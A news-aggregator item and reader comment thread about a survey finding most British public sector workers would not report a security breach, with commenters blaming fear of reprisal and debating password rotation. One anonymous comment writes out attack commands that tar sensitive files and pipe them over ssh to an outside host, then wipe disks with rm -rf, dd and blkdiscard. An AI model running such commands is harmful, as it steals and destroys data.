Survey: 2/3 of Public Sector Workers Wouldn't Report a Security Breach

An anonymous reader sends news of a survey of workers in the public sector conducted by Daisy Group, a British IT firm, which found that 64% of them would stay quiet about a security breach they noticed. The survey also found that 5% of workers admitted to disabling the password protection features on their work devices, and 20% said they don't update their passwords regularly. Daisy Group's Graham Harris said, "When it comes to data security, all too often organisations focus purely on IT processes and forget about the staff that will be using them. Human error is one of, if not the most likely source for data security issues, and fear of reprisal is a powerful force." 16% of respondents said they didn't know if data protection was an important part of their company's security practices.

all of that can be fixed

[ganjadude]

if only we give the government more money

Re:all of that can be fixed

if only we give the government more money

Yes, but only if the money is spent on private contractors with a profit motive. An extra middle man with a profit motive, on top of any actual requirements, always makes things better, even Mid East wars.

Humans

[koan]

The weakest link.

Re: Humans

[BVis]

I suspect the 2/3rds figure is coming from the fact that the person creating the gap in security is above a given person on the org chart. Pissing off your superiors is a great example of a Career Limiting Event. Rank has its privileges. I have not yet seen an organization of any appreciable size, public or private, where those at the top do not consider themselves above security policy. That's for the plebs, kind of like how taxes are for little people. While your typical rank and file worker may have to change his/her password every 90 days with one of a given complexity that has not been used before, the CEO says he wants to use a simple password (no joke, I've seen them use the name of the company all lower case) that does not expire. That's a clear breach of written security policy. But, who's going to call him on it? Nobody, if they want to keep their jobs.

Ironically, the employees for whom following security policy is most important (not only due to company policy, but frequently due to external regulations like SOX, HIPAA, PCI, etc.) are the ones who are most likely to be able to bully IT staff into making exceptions.

comment subject here

[Falos]

Do we give out points on evaluations for "fully complies with security policy every time"? No, we slam plebs with metrics and quotas, after a childhood revolving around GPAs and diploma checkboxes and life-story-in-one-page application rodeos. We've trained society to game the system and if they're giving fucks in a certain, limited fashion, it's because the world only gives fucks in a certain, limited fashion.

Of-fucking-course they game the system. "Fear of reprisal" isn't even a core symptom.

Password updating

[ngc5194]

Okay, the bit about how many folks wouldn't report a security breach is disturbing, but what's the fixation with updating passwords? I've been working in computer security for decades, and I almost never update passwords unless I'm required to or there is an incident. I'd much rather have my users pick strong passwords and not change them often than pick weak passwords because I insist they change them often. Sure, it's not just an either/or, but on the list of my concerns about system security, how frequently users update their passwords ranks WAAAAY down on the list.

Re:Password updating

[ganjadude]

im with you there. and ive even read some research that making people change passwords often in fact makes things worse as people tend to forget and write down passwords that change more often.

Re:Password updating

[Z00L00K]

I agree to some extent - frequent changes hurts more than it helps. Changing password shall be when it's considered necessary, and it's only you that uses the password that can decide that.

But to increase security a 2-factor authentication shall be used, so that you need to combine with a keycard or similar in order to gain access. That will make it harder for anyone that wants to gain access to the net.

But if you want higher security you should also build your net within a company on segments so that there are several separate segments of the network within the company. E.g. Human Resources should run their segment, Management another etc. That way a security compromise would not be as serious as if it was on a non-segmented network. This will of course require separate servers for the different segments and internal firewalls.

Re:Password updating

Posting AC on this just because this is a common topic:

Updating passwords is a quick band-aid, mainly to show that after a breach, -something- is done. So, the first thing done is that the Windows admin runs:

dsquery user | dsmod user -mustchpwd yes

and the place says they have "taken proper security precautions".

As for reporting security breaches, here in the US, one is bred from birth (if they are born in the 1990s or later) to "sit down, shut up, and stop snitchin'". A good example of what happens if one reports security holes is what happened to my GF's son, who was in high school at the time. He had a classmate who who found a security issue with the school's website and reported it. Well, he got arrested on the spot at the principal's office for a CFAA violation and expelled. Not for -using- the breach, but just -mentioning- it. The CFAA charge didn't stick (since he didn't use the exploit), but the expulsion did [1].

This carries to the work world. I worked at one job where we were told to challenge people who were tailgating. One day, I was going in the building, had someone following me close behind. I refused to open the door and called security because the guy didn't have a badge, and refused to show ID. Well, he turned out to be some muckety muck with a high office, and I ended up getting handed my walking papers that day because "I didn't play well with senior company officials", even though policy was to disallow tailgating.

So, it is no wonder why people are not going to go out of their way to report security related items. If one is in school, they get threatened with expulsion and arrest. In the work world, it is blacklisting, arrest, and loss of a job.

The lack of resources put into security and the prompt punishing of people who "see something, say something" is part of why China is assraping us so hard when it comes to security. If someone mentions -anything- out of the ordinary, they get the Richard Jewel treatment, so in the school and work environment, it is just keep the head down and shut up.

What can you do? I'm lucky to work at a place where they are responsive to security, but in most places, one might have to resort to anonymous tips to the FBI and other LEOs about the breach in order for anything to get done.

I wonder what will happen long term when security breaches don't just constitute a "tar /home/SensitiveDataStash/*|ssh foo.com "cat - > foo.tar"', but following the offsite copy, a "rm -rf /home", followed by a "dd if=/dev/zero of=/dev/sda" if the drive is an array, HDD, or LUN or a "blkdiscard /dev/hda" if a SSD. Right now, companies don't give a rat's ass if they get broken into and data snarfed... but once the bad guys start destroying data, people will care. However, with the fact that any employees who might mention a security issue would get shitcanned, it is going to take a big company going out of business for security policies to actually be enacted that make sense. It may even take major loss of life.

[1]: Irony is that the kid got his GED and his high school equivalency, and is doing far better than he would had he graduated HS.

Re:Password updating

[Rockoon]

Your password must be at least 6 characters and contain at least one of each of the following: The letter "q", the letter "w", the letter "e", the letter "r", the letter "t", and the letter "y".

You're God damn right I wouldn't

What benefit would there be in reporting a security breach? Workers, especially in the public sector, are increasingly being treated as the enemy when they report this sort of thing. Governments have created an environment where any sort of whistle-blowing is viewed as a hostile action, and employees are often rewarded with termination, lawsuits, or jail time. Until that climate changes for the better, I'm just going to do my job and keep my fucking mouth shut.

So...

[fuzzyfuzzyfungus]

What percentage of them would expect to receive zero praise and potential reprisal if they did report a security problem?

Yeah, sure, it's depressing that people aren't courageous moral heroes, or motivated to go above and beyond, most of the time, especially about boring stuff or things likely to get them in trouble.

Guess what? That's one of the areas where management is supposed to be earning its money. One of the differences between an effective organization and a trainwreck is how good the flow of information is: are important observations from the periphery being collated and passed on so that HQ can actually achieve a coherent larger picture of the world? Are directions and information passed back down usefully informed by that picture? Or do you have unrealistic demands and buzzword nonsense flowing down; and soothing lies flowing up?

This doesn't mean that 100% of employees are innocent('insider threats' are a subset of 'people who wouldn't report a security breach', since they create them; but not a terribly large subset); but if you have this problem on a large scale, that's because your organization is dysfunctional.

Maybe because security people are dicks?

[gestalt_n_pepper]

At my nameless three letter organization, here's how security works.

"Oh, you didn't name your database server according to our specifications required by our lame monitoring tool that can't handle nonstandard system names? Rename your server. Oh, and if it breaks the database, that's your problem."

"We just patched all the servers for greater security. Too bad you can't use your software to control or monitor them anymore, but that's your problem."

"Due to a breach, everyone must change their password. Too bad it happened while you were off for a few days and needed to log in for an emergency, but that's your problem."

Security's motto: We break stuff, put ALL the burden on the users, walk away AND we get paid for it!

I don't know any other job where you can receive money for making stuff *not* work.

Re:Maybe because security people are dicks?

Actually, security's motto is "If you can do your job, we're not doing ours."

Re:Reprisal..

[Austerity+Empowers]

Being fired is extreme, but in at least two companies I worked for, there was a strong "you broke it, you bought it" mentality to this sort of thing. If you found a security issue, you were expected to move across the corporation until it got fixed. Derailing your actual job, your personal life, and just about any hope of happiness until it got fixed. Of course you don't report it.

The issue frequently is that IT is seen as the cost center to reduce most, so getting someone in IT to a) acknowledge it is an issue not user error/invalid use case requires champion effort, b) the IT guys that exist are marginally competent, the good ones are too expensive to work here full time, c) frequently users are told how dumb they are, so they aren't even sure if they've found an issue or "I must be doing something wrong", d) how did you find it in the first place? Were you doing something you shouldn't? HMMM?

Lies, damn lies and statistics.

[jklovanc]

What were the actual questions? Was it worded to elicit no's? Did the respondents understand the question?
What was the definition of "major security breach"? Was the threshold so low that things like not changing a password every 30 days is a major security breach? Who responded to the survey? Were they people who only see low level issues?

Surveys can be tailored to get any desired response.

Re:suspect it's much worse in the private sector

Given that public jobs are relatively secure, you can assume this issue is much worse in the private sector.

I wouldn't bet on that. Private sector involves losses and someone would be held to account. It really depends on the size and setup of the org.

If you see a problem and point it out, you will be held to account unless you do everything you can to fix it. In a large organization, odds are you won't have the power to fix it, and you will get blamed for failing to fix it. If you don't tell anyone you see a problem, you can deny you knew there was a risk of a problem. Rational actors become less willing to report problems when people are "held to account", because *they* won't be held to account unless they admit they know of an issue.

My last two employers had amazingly terrible security for exactly this reason. Everyone knew that anyone who pointed out a problem would be the scapegoat if anything went wrong. I now work in a private company which has a policy of "blameless post-mortems" for exactly this reason. By making an explicit rule that people will not be punished if they explain what went wrong and make a good faith effort to fix it, you actually get things fixed instead of "holding people to account".

Re:Game the System

[polyphemus]

Legit. Especially given the culture of "it's only wrong if you get caught" attitude towards breaking rules that pervades so many of our high schools and trickles up into college and the work force with every graduation, and then gets reinforced with every performance evaluation or annual bonus.

Private sector's no better, probably worse

[__roo]

People will trade their passwords for a candy bar.

Plus, public sector workers at least have some job security. I've worked in the private sector for 20+ years, there's a reason it's called "at-will" employment. Sticking your neck out to report a breach won't win you any friends, doesn't gain you anything, and if it get someone who's politically savvy in trouble it could blow back on you. Safer and easier to keep quiet and keep your job.

I wish it weren't like that—and to be fair, the best teams I've worked with weren't (and aren't!) like that. But way too many offices run that way, and politics and sleaziness beats honesty and ethics nine times out of ten.

agreed . 18 years in infosec here

[raymorris]

I've been doing infosec for 18 years and fully agree. Forcing people to change passwords simply forces them to increment a number at the end or write them down. It also forces you to allow more failures in your brute force detection.

With pass phrases, it's mostly about using LONG ones. Yeah, pass phrases, not passwords. Then make damn sure your not using des hashes or something else that truncates passwords anywhere.

when reporting one takes filling out a TPS report

[Joe_Dragon]

when reporting one takes filling out a TPS report and talking to 8 different higher ups meany non tech people who wants to do it?